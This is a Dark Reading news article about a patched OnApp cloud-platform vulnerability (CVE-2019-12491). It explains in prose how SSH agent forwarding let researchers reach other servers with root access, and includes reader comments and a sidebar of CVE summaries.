Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Cloud

9/27/2019
03:15 PM
Connect Directly
Twitter
LinkedIn
Google+
RSS
E-Mail
50%
50%

Cloud Vulnerability Could Let One Server Compromise Thousands

A flaw in the OnApp cloud management platform could let an attacker compromise a private cloud with access to a single server.

A newly disclosed critical vulnerability in the OnApp cloud orchestration platform could let an attacker compromise an entire private cloud with access to a single server, researchers report.

The finding comes from researchers at security firm Skylight Cyber who say the flaw has the potential to affect hundreds of thousands of production servers and organizations around the world. OnApp is a London-based cloud management platform, one of the top firms that powers thousands of clouds for managed service providers, telcos, and other cloud hosting services.

Cloud security issues are common these days; however, we usually see them in the context of user misconfigurations and resulting accidental data leaks. In most cases, these mishaps are the user's fault. This particular flaw, located in a management system that thousands of providers use, could let an attacker access, steal, change, or eliminate data on a server through no fault of the user or provider.

OnApp's strategy for managing different servers in the cloud environment could allow attackers to achieve remote code execution (RCE) with root privileges. They simply need to rent a server — a simple process, and one that many companies require only an email address to do.

With that server, an attacker could compromise an entire private cloud due to the way OnApp manages different servers in the cloud environment, researchers explain in a technical blog post. Any user could trigger an SSH connection from OnApp to the managed server due to "agent forwarding," which lets an attacker relay authentication to any server in the same cloud.

The vulnerability affects all OnApp control panels managing Xen or KVM compute resources, OnApp says in a security advisory. It does not affect OnApp control panels that only manage VMware vCloud Director, VMware vCenter environments, or CDN-only control panels. The company has issued a patch for the flaw and says there are no feasible workarounds for this.

Researchers tested, confirmed, and replicated their methodology across multiple cloud vendors, using OnApp for Xen and KVM hypervisors. In fact, it worked for them on the first try.

How They Found It
Skylight began investigating this in May when alerted to hate messages targeting the campaign of an Australian federal parliament member running for office. Emails were disguised to appear as though they came from many Australian businesses; however, they came from a single source.

Analysis of the emails led to the discovery of several servers used to send them. It seems the attacker preferred to use a single hosting company, probably because it didn't require payment or ID to start a free 24-hour trial. Researchers decided to mimic the steps of the attacker and see if they left incriminating evidence. With nothing found, they hypothesized there could be a bug.

The researchers explored the control panel of the hosting company and saw there was an SSH connection between their server and the cloud provider. A public key had been pre-installed to access the server, prompting the team to wonder whether the management software was using the same key pair to manage every server. Researchers found this was the case, and they could launch an SSH connection to any server with the hosting company. They could do this even if they didn't have the private key, which granted the same level of root access the provider had.

Agent forwarding made this possible. A feature of SSH, this lets you connect to a remote machine via SSH and give that machine the ability to use SSH to connect to other machines — without ever having the private authentication key or the passphrase that protects it, researchers explain.

The benefit is that someone can keep a private key locally, on one server, instead of storing it on multiple servers to authenticate connections. Using agent forwarding, this server can provide a remote server with the means to use the private key without having to expose it. The local machine answers "key challenges" and relays them through the remote server to target servers.

Researchers call this "an extremely dangerous feature." With agent forwarding enabled, a remote server accepting your SSH connection could authenticate to any server that accepts your credentials. They were able to trigger management software to use SSH to connect to their server and run commands, then swap the code it was intended to execute with arbitrary code by replacing one of the binaries it commonly executes. OnApp's configuration of SSH with agent forwarding gave researchers a full chain to compromise all servers in a hosting company with root privileges.

Researchers tested this by setting up a source server, which an attacker could obtain with a simple free trial, and a target server. They overwrote the "tput" binary on the source server with their own script that used SSH forwarding to connect with the target server and drop a flag file. They triggered the management software and saw the flag file appear on the target server.

"If we could replicate this across other companies, then the impact is much greater and more dangerous," according to Skylight Cyber. "All we have to do is find cloud providers using OnApp, rent a couple of servers, and test our thesis again."

The vulnerability was assigned to the ID CVE-2019-12491.

Related Content:

Check out The Edge, Dark Reading's new section for features, threat data, and in-depth perspectives. Today's top story: "Why Clouds Keep Leaking Data."

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial ... View Full Bio

Comment  | 
Print  | 
More Insights
Comments
Newest First  |  Oldest First  |  Threaded View
LeonorCastro
50%
50%
LeonorCastro,
User Rank: Apprentice
10/1/2019 | 3:18:20 AM
Re: OnApp reached out to me a few months ago
Good share!
tdsan
100%
0%
tdsan,
User Rank: Ninja
9/30/2019 | 1:46:10 PM
OnApp reached out to me a few months ago

The researchers explored the control panel of the hosting company and saw there was an SSH connection between their server and the cloud provider. A public key had been pre-installed to access the server, prompting the team to wonder whether the management software was using the same key pair to manage every server. Researchers found this was the case, and they could launch an SSH connection to any server with the hosting company. They could do this even if they didn't have the private key, which granted the same level of root access the provider had.

 It is interesting that you bring this up, because we had tested their solution out but they did not allow us to test the internet connectivity of their cloud solution. Whew, I am glad that we did not decide to go with it due to testing limitations they put on their product. Well, this is good to know and one thing, the price of the product was way outside of the major cloud providers or CSPs (Cloud Service Providers).


Anyway, thank you for the insight.

Tod
7 Tips for Infosec Pros Considering A Lateral Career Move
Kelly Sheridan, Staff Editor, Dark Reading,  1/21/2020
For Mismanaged SOCs, The Price Is Not Right
Kelly Sheridan, Staff Editor, Dark Reading,  1/22/2020
Register for Dark Reading Newsletters
White Papers
Video
Cartoon Contest
Current Issue
IT 2020: A Look Ahead
Are you ready for the critical changes that will occur in 2020? We've compiled editor insights from the best of our network (Dark Reading, Data Center Knowledge, InformationWeek, ITPro Today and Network Computing) to deliver to you a look at the trends, technologies, and threats that are emerging in the coming year. Download it today!
Flash Poll
How Enterprises are Attacking the Cybersecurity Problem
How Enterprises are Attacking the Cybersecurity Problem
Organizations have invested in a sweeping array of security technologies to address challenges associated with the growing number of cybersecurity attacks. However, the complexity involved in managing these technologies is emerging as a major problem. Read this report to find out what your peers biggest security challenges are and the technologies they are using to address them.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2015-3154
PUBLISHED: 2020-01-27
CRLF injection vulnerability in Zend\Mail (Zend_Mail) in Zend Framework before 1.12.12, 2.x before 2.3.8, and 2.4.x before 2.4.1 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via CRLF sequences in the header of an email.
CVE-2019-17190
PUBLISHED: 2020-01-27
A Local Privilege Escalation issue was discovered in Avast Secure Browser 76.0.1659.101. The vulnerability is due to an insecure ACL set by the AvastBrowserUpdate.exe (which is running as NT AUTHORITY\SYSTEM) when AvastSecureBrowser.exe checks for new updates. When the update check is triggered, the...
CVE-2014-8161
PUBLISHED: 2020-01-27
PostgreSQL before 9.0.19, 9.1.x before 9.1.15, 9.2.x before 9.2.10, 9.3.x before 9.3.6, and 9.4.x before 9.4.1 allows remote authenticated users to obtain sensitive column values by triggering constraint violation and then reading the error message.
CVE-2014-9481
PUBLISHED: 2020-01-27
The Scribunto extension for MediaWiki allows remote attackers to obtain the rollback token and possibly other sensitive information via a crafted module, related to unstripping special page HTML.
CVE-2015-0241
PUBLISHED: 2020-01-27
The to_char function in PostgreSQL before 9.0.19, 9.1.x before 9.1.15, 9.2.x before 9.2.10, 9.3.x before 9.3.6, and 9.4.x before 9.4.1 allows remote authenticated users to cause a denial of service (crash) or possibly execute arbitrary code via a (1) large number of digits when processing a numeric ...